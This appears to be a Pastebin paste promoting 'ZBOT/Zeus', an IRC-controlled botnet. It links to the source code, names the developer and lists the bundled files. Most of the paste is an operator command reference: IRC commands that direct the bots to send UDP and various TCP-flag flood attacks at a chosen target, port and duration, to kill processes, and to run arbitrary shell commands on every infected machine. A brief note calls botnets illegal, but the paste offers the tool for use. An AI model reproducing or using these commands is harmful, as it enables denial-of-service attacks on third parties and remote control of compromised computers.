Advertisement
1337ings

ZBOT-Botnet [IRC Based Bot]

Jul 11th, 2017
1,226
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.44 KB | None | 0 0
  1. ZBOT-Botnet / Zeus-Botnet
  2. Requirements: CentOS 6.8/6.9 x64 Server
  3. Source-code: https://github.com/codingplanets/ZBOT-Botnet
  4. Developer: @codingplanets | Chris Poole
  5. -
  6. Botnets are illegal, very illegal. Across the globe
  7.  
  8. Especially ones that are programmed to perform denial of service attacks.
  9.  
  10. ZBOT/Zeus is a IRC based botnet, you will have to compile it with UnrealIRC3.2-*
  11.  
  12. DISCLAIMER
  13. I'm not giving any tutorials on the setup process, If you would like more information on it;
  14.  
  15. insist of messaging me via Twitter! http://twitter.com/codingplanets
  16.  
  17. "From one lulzy trollist to the next I can do my best to be the best of the rest" -Chris Poole
  18.  
  19. File contents
  20. zbot-setup.py | zbot.c | zbot-build | Unreal3.2.zip
  21.  
  22. IRC Commands
  23. !* udp <target> <port> <time> | raw udp attack
  24. !* syn <target> <port> <time> | tcp syn attack
  25. !* fin <target> <port> <time> | tcp fin attack
  26. !* psh <target> <port> <time> | tcp psh attack
  27. !* ack <target> <port> <time> | tcp ack attack
  28. !* urg <target> <port> <time> | tcp urg attack
  29. !* rst <target> <port> <time> | tcp rst attack
  30. !* ece <target> <port> <time> | tcp ece attack
  31. !* cwr <target> <port> <time> | tcp cwr attack
  32. !* sew <target> <port> <time> | tcp sew attack
  33. !* xmas <target> <port> <time> | tcp xmas attack
  34. !* unknown <target> <time> | unknown attack type
  35. !* kill | kill all pids
  36. !* killall | kill all packeting attacks
  37. !* sh <command> | sends command across all bots
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement